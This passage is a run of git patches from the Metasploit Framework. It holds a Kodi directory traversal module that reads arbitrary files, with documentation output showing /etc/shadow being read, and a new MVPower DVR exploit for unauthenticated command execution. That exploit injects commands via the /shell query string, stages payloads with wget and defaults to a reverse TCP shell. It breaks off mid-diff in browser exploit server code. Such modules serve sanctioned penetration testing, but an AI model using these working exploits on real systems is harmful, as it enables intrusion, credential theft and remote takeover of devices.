'../' * datastore['DEPTH'] + f = datastore['FILE'] + f = f[1, f.length] if f =~ /^\// + f = "image/image://" + Rex::Text.uri_encode(traverse + f, "hex-all") + + uri = normalize_uri(base, Rex::Text.uri_encode(f, "hex-all")) + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => uri + }) + + if res and res.code != 200 + print_error("Unable to read '#{datastore['FILE']}', possibily because:") + print_error("\t1. File does not exist.") + print_error("\t2. No permission.") + + elsif res and res.code == 200 + data = res.body.lstrip + fname = datastore['FILE'] + p = store_loot( + 'kodi', + 'application/octet-stream', + ip, + data, + fname + ) + + vprint_line(data) + print_good("#{fname} stored as '#{p}'") + + else + print_error("Fail to obtain file for some unknown reason") + end + end + +end From 73eed104a9b5d2fa22ffb262b782d224027bba54 Mon Sep 17 00:00:00 2001 From: jvoisin Date: Mon, 20 Feb 2017 13:22:20 +0100 Subject: [PATCH 13/37] Take into account @h00die's comments. --- .../auxiliary/scanner/http/kodi_traversal.md | 13 +++++++------ modules/auxiliary/scanner/http/kodi_traversal.rb | 8 ++++---- 2 files changed, 11 insertions(+), 10 deletions(-) diff --git a/documentation/modules/auxiliary/scanner/http/kodi_traversal.md b/documentation/modules/auxiliary/scanner/http/kodi_traversal.md index 870de95b28..8280ebefeb 100644 --- a/documentation/modules/auxiliary/scanner/http/kodi_traversal.md +++ b/documentation/modules/auxiliary/scanner/http/kodi_traversal.md @@ -1,17 +1,18 @@ ## Vulnerable Application -This module exploits an arbitrary file disclosure vulnerability in Kodi 17.1. +This module exploits an arbitrary file disclosure vulnerability in Kodi before 17.1. **Vulnerable Application Installation Steps** Grab whatever image from [libreelec](https://libreelec.tv/downloads/) if -you're lazy, or [install kodi from scratch](http://kodi.wiki/view/HOW-TO:Install_Kodi_for_Linux). +you're lazy, like the [one for the Rpi2](http://releases.libreelec.tv/LibreELEC-RPi2.arm-7.0.3.img.gz), +or [install kodi from scratch](http://kodi.wiki/view/HOW-TO:Install_Kodi_for_Linux). -You'll need a version lower than 17.1. +You'll need a version lower than 17.1 of Kodi. ## Verification Steps -A successful check of the exploit will look like this: +A successful run of the exploit will look like this: ``` msf > use auxiliary/scanner/http/kodi_traversal @@ -19,6 +20,8 @@ msf auxiliary(kodi_traversal) > set RPORT 8080 RPORT => 8080 msf auxiliary(kodi_traversal) > set RHOSTS 192.168.0.31 RHOSTS => 192.168.0.31 +msf auxiliary(kodi_traversal) > set FILE /etc/shadow +FILE => /etc/shadow msf auxiliary(kodi_traversal) > run [*] Reading '/etc/shadow' @@ -35,6 +38,4 @@ dbus:*::::::: system:*::::::: sshd:*::::::: avahi:*::::::: -msf auxiliary(kodi_traversal) > info - ``` diff --git a/modules/auxiliary/scanner/http/kodi_traversal.rb b/modules/auxiliary/scanner/http/kodi_traversal.rb index 6c32bd9dec..b3997770ca 100644 --- a/modules/auxiliary/scanner/http/kodi_traversal.rb +++ b/modules/auxiliary/scanner/http/kodi_traversal.rb @@ -13,9 +13,9 @@ class MetasploitModule < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'Kodi 17.1 Local File Inclusion Vulnerability', + 'Name' => 'Kodi 17.0 Local File Inclusion Vulnerability', 'Description' => %q{ - This module exploits a directory traversal flaw found in Kodi 17.1. + This module exploits a directory traversal flaw found in Kodi before 17.1. }, 'References' => [ @@ -33,7 +33,7 @@ class MetasploitModule < Msf::Auxiliary register_options( [ OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']), - OptString.new('FILE', [true, 'The file to obtain', '/etc/shadow']), + OptString.new('FILE', [true, 'The file to obtain', '/etc/passwd']), OptInt.new('DEPTH', [true, 'The max traversal depth to root directory', 10]) ], self.class) end @@ -77,7 +77,7 @@ class MetasploitModule < Msf::Auxiliary print_good("#{fname} stored as '#{p}'") else - print_error("Fail to obtain file for some unknown reason") + print_error('Fail to obtain file for some unknown reason') end end From e491f01c708fbed33ae231a53c4153c07d22b144 Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Wed, 22 Feb 2017 05:15:57 +0000 Subject: [PATCH 14/37] Add MVPower DVR Shell Unauthenticated Command Execution module --- .../linux/http/mvpower_dvr_shell_exec.rb | 99 +++++++++++++++++++ 1 file changed, 99 insertions(+) create mode 100644 modules/exploits/linux/http/mvpower_dvr_shell_exec.rb diff --git a/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb b/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb new file mode 100644 index 0000000000..bc5c51091c --- /dev/null +++ b/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb @@ -0,0 +1,99 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + HttpFingerprint = { :pattern => [ /JAWS\/1\.0/ ] } + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'MVPower DVR Shell Unauthenticated Command Execution', + 'Description' => %q{ + This module exploits an unauthenticated remote command execution + vulnerability in MVPower digital video recorders. The 'shell' file + on the web interface executes arbitrary operating system commands in + the query string. + + This module was tested successfully on a MVPower model TV-7104HE with + firmware version 1.8.4 115215B9 (Build 2014/11/17). + + The TV-7108HE model is also reportedly affected, but untested. + }, + 'Author' => + [ + 'Paul Davies (UHF-Satcom)', # Initial vulnerability discovery and PoC + 'Andrew Tierney (Pen Test Partners)', # Independent vulnerability discovery and PoC + 'Brendan Coles ' # Metasploit + ], + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'References' => + [ + # Comment from Paul Davies contains probably the first published PoC + [ 'URL', 'https://labby.co.uk/cheap-dvr-teardown-and-pinout-mvpower-hi3520d_v1-95p/' ], + # Writeup with PoC by Andrew Tierney from Pen Test Partners + [ 'URL', 'https://www.pentestpartners.com/blog/pwning-cctv-cameras/' ] + ], + 'DisclosureDate' => 'Aug 23 2015', + 'Privileged' => true, # BusyBox + 'Arch' => ARCH_ARMLE, + 'DefaultOptions' => + { + 'Payload' => 'linux/armle/mettle_reverse_tcp' + }, + 'Targets' => + [ + ['Automatic', {}] + ], + 'DefaultTarget' => 0)) + deregister_options('CMDSTAGER::FLAVOR') + end + + def check + begin + fingerprint = Rex::Text::rand_text_alpha(rand(10) + 6) + res = send_request_cgi({ + 'uri' => "/shell?echo+#{fingerprint}", + 'headers' => { 'Connection' => 'Keep-Alive' } + }) + if res && res.body =~ /#{fingerprint}/ + return Exploit::CheckCode::Vulnerable + end + rescue ::Rex::ConnectionError + return Exploit::CheckCode::Unknown + end + Exploit::CheckCode::Safe + end + + def execute_command(cmd, opts) + begin + res = send_request_cgi({ + 'uri' => "/shell?#{Rex::Text.uri_encode(cmd, 'hex-all')}", + 'headers' => { 'Connection' => 'Keep-Alive' } + }) + return res + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") + end + end + + def exploit + print_status("#{peer} - Connecting to target") + + unless check == Exploit::CheckCode::Vulnerable + fail_with(Failure::Unknown, "#{peer} - Target is not vulnerable") + end + + print_good("#{peer} - Target is vulnerable!") + + execute_cmdstager(flavor: :wget, linemax: 1500) + end +end From 47fec5626e220c8230b25ccdb0efbd8689da74b9 Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Wed, 22 Feb 2017 07:56:17 +0000 Subject: [PATCH 15/37] Style update --- .../linux/http/mvpower_dvr_shell_exec.rb | 30 +++++++++---------- 1 file changed, 14 insertions(+), 16 deletions(-) diff --git a/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb b/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb index bc5c51091c..13dc116829 100644 --- a/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb +++ b/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb @@ -3,8 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' - class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking @@ -47,39 +45,39 @@ class MetasploitModule < Msf::Exploit::Remote 'Arch' => ARCH_ARMLE, 'DefaultOptions' => { - 'Payload' => 'linux/armle/mettle_reverse_tcp' + 'Payload' => 'linux/armle/mettle_reverse_tcp', + 'cmdstager::flavor' => 'wget' }, 'Targets' => [ ['Automatic', {}] ], - 'DefaultTarget' => 0)) - deregister_options('CMDSTAGER::FLAVOR') + 'CmdStagerFlavor' => %w{ echo printf wget }, + 'DefaultTarget' => 0)) end def check begin fingerprint = Rex::Text::rand_text_alpha(rand(10) + 6) - res = send_request_cgi({ + res = send_request_cgi( 'uri' => "/shell?echo+#{fingerprint}", 'headers' => { 'Connection' => 'Keep-Alive' } - }) - if res && res.body =~ /#{fingerprint}/ - return Exploit::CheckCode::Vulnerable + ) + if res && res.body.include?(fingerprint) + return CheckCode::Vulnerable end rescue ::Rex::ConnectionError - return Exploit::CheckCode::Unknown + return CheckCode::Unknown end - Exploit::CheckCode::Safe + CheckCode::Safe end def execute_command(cmd, opts) begin - res = send_request_cgi({ + send_request_cgi( 'uri' => "/shell?#{Rex::Text.uri_encode(cmd, 'hex-all')}", 'headers' => { 'Connection' => 'Keep-Alive' } - }) - return res + ) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end @@ -88,12 +86,12 @@ class MetasploitModule < Msf::Exploit::Remote def exploit print_status("#{peer} - Connecting to target") - unless check == Exploit::CheckCode::Vulnerable + unless check == CheckCode::Vulnerable fail_with(Failure::Unknown, "#{peer} - Target is not vulnerable") end print_good("#{peer} - Target is vulnerable!") - execute_cmdstager(flavor: :wget, linemax: 1500) + execute_cmdstager(linemax: 1500) end end From 84ab3c66ccda4d9be194e0c56ed92b0782b20f5f Mon Sep 17 00:00:00 2001 From: Jeff Tang Date: Wed, 22 Feb 2017 12:45:49 -0500 Subject: [PATCH 16/37] Use obfuscated JS in BES --- lib/msf/core/exploit/remote/browser_exploit_server.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb index a99147dd1c..4e2a2c677d 100644 --- a/lib/msf/core/exploit/remote/browser_exploit_server.rb +++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb @@ -501,7 +501,7 @@ module Msf %Q|